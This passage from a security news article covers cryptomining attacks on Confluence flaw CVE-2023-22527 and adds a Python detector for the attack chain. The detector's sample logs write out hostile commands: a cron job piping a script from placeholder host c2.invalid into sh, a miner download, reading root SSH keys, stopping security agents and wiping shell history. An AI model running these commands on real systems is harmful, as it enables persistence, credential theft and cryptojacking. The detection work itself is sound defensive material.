Trend Micro states that at least three different threat actors are exploiting the flaw in cryptomining campaigns. The first threat actor is using the XMRig miner to execute miner activity via an ELF file payload. A second threat actor used a shell script to execute cryptocurrency mining activities across all accessible endpoints in the customer environment using Secure Shell (SSH). The script used by the threat actor first terminates known cryptomining processes and those running from temporary directories. It then deletes all cron jobs and adds a new one to maintain command-and-control server connectivity. The script disables security services like Alibaba Cloud Shield and Tencent Cloud mirrors and collects IP addresses, users, and SSH keys to target other systems via SSH for cryptomining. The attacker uses multiple cron jobs to maintain persistence, downloads the XMRig miner, and ensures all security tools are disabled before beginning mining activities. In the last stage of the attack, threat actors clear logs and bash history to remove traces of their activities.
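The stages of the shell script described above (killing rival miners, wiping and re-adding cron jobs, stopping cloud security agents, reading SSH keys, fetching XMRig, clearing history) each leave a recognisable command line in process-execution telemetry. The following is an added detection example, not code from Trend Micro or from this article: it runs a set of stage-specific rules over constructed log lines and flags a host/user pair when several distinct stages appear. The log format, the agent service names (`aliyun`, `aegis`, `yunjing`, `ydservice`), the host `c2.invalid`, and the threshold of three stages are assumptions, not values taken from the report.

```python
"""
Added example (not Trend Micro's or Security Affairs' code): a small detector
for the post-exploitation chain described in the report, run over constructed
process-execution log lines. The log format, service names and alert threshold
are assumptions, not values from the report.
"""
import re
from collections import defaultdict
from dataclasses import dataclass

# Constructed sample telemetry (assumed EDR/auditd-style execve summaries).
# Host names, user names and c2.invalid are placeholders, not real indicators.
SAMPLE_LOG = """\
2024-06-01T10:00:01Z conf01 user=confluence cmd="ls -la /opt/atlassian"
2024-06-01T10:00:05Z conf01 user=confluence cmd="pkill -f xmrig"
2024-06-01T10:00:06Z conf01 user=confluence cmd="pkill -f /tmp/"
2024-06-01T10:00:09Z conf01 user=confluence cmd="crontab -r"
2024-06-01T10:00:10Z conf01 user=confluence cmd="(crontab -l; echo '*/10 * * * * curl -s http://c2.invalid/x.sh | sh') | crontab -"
2024-06-01T10:00:15Z conf01 user=confluence cmd="systemctl stop aliyun.service"
2024-06-01T10:00:16Z conf01 user=confluence cmd="service YDService stop"
2024-06-01T10:00:20Z conf01 user=confluence cmd="cat /root/.ssh/id_rsa /root/.ssh/known_hosts"
2024-06-01T10:00:30Z conf01 user=confluence cmd="wget -q http://c2.invalid/xmrig -O /tmp/.x"
2024-06-01T10:01:00Z conf01 user=confluence cmd="history -c"
2024-06-01T10:01:01Z conf01 user=confluence cmd="rm -f /root/.bash_history"
2024-06-01T11:00:00Z conf01 user=admin cmd="systemctl status nginx"
"""

# Assumed line layout: <timestamp> <host> user=<user> cmd="<command line>"
LINE_RE = re.compile(
    r'^(?P<ts>\S+)\s+(?P<host>\S+)\s+user=(?P<user>\S+)\s+cmd="(?P<cmd>.*)"$'
)

# One rule per stage the report describes. A rule is a tuple of regexes that
# must ALL match the command line (matched case-insensitively).
# Agent names (aliyun, aegis, yunjing, ydservice) are assumed, not from the report.
RULES = {
    "kill_miner_procs": (r"\b(pkill|killall|kill)\b", r"xmrig|minerd|kdevtmpfsi|/tmp/"),
    "cron_wipe": (r"crontab\s+-r\b|rm\s+-r?f\s+/var/spool/cron|rm\s+-r?f\s+/etc/cron",),
    "cron_persist_remote": (r"crontab\s+-", r"\b(curl|wget)\b"),
    "security_agent_disable": (r"\b(systemctl|service)\b", r"\b(stop|disable)\b",
                               r"aliyun|aegis|yunjing|ydservice"),
    "ssh_key_harvest": (r"\.ssh/(id_[a-z0-9]+|known_hosts|authorized_keys)",),
    "miner_download": (r"\b(curl|wget)\b", r"xmrig"),
    "trace_removal": (r"history\s+-c\b|\.bash_history|rm\s+-r?f\s+/var/log|>\s*/var/log/",),
}


@dataclass(frozen=True)
class Finding:
    line_no: int
    host: str
    user: str
    rule: str
    cmd: str


def match_rules(cmd: str) -> list[str]:
    """Return the names of every rule whose regexes all match this command."""
    return [name for name, pats in RULES.items()
            if all(re.search(p, cmd, re.I) for p in pats)]


def scan(log_text: str) -> list[Finding]:
    """Parse each log line and emit one Finding per (line, matching rule)."""
    findings = []
    for n, line in enumerate(log_text.splitlines(), 1):
        m = LINE_RE.match(line)
        if not m:
            continue  # not in the assumed format; ignore rather than guess
        for rule in match_rules(m["cmd"]):
            findings.append(Finding(n, m["host"], m["user"], rule, m["cmd"]))
    return findings


def assess(findings: list[Finding], threshold: int = 3) -> dict:
    """Group findings per host/user; flag an actor once `threshold` distinct
    stages are seen, so a lone 'pkill xmrig' by an admin is not an alert."""
    by_actor: dict[str, set[str]] = defaultdict(set)
    for f in findings:
        by_actor[f"{f.host}/{f.user}"].add(f.rule)
    return {actor: {"rules": sorted(rules), "suspicious": len(rules) >= threshold}
            for actor, rules in by_actor.items()}


if __name__ == "__main__":
    hits = scan(SAMPLE_LOG)
    for f in hits:
        print(f"line {f.line_no:>2} {f.rule:<24} {f.cmd}")
    for actor, verdict in assess(hits).items():
        print(actor, "SUSPICIOUS" if verdict["suspicious"] else "ok", verdict["rules"])
```

The threshold exists because individual stages are noisy on their own (administrators do stop services and run `pkill`); the combination of cron wiping, agent disabling, key reading and history clearing by one account in a short window is what distinguishes this script from routine work. In a real deployment the rules would be fed from the EDR or auditd `execve` stream rather than a string constant, and the time window would be bounded.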
“With its continuous exploitation by threat actors, CVE-2023-22527 presents a significant security risk to organizations worldwide. To minimize the risks and threats associated with this vulnerability, administrators should update their versions of Confluence Data Center and Confluence Server to the latest available versions as soon as possible,” concludes the report.
Organizations are urged to update their Confluence instances and implement security best practices to protect their systems.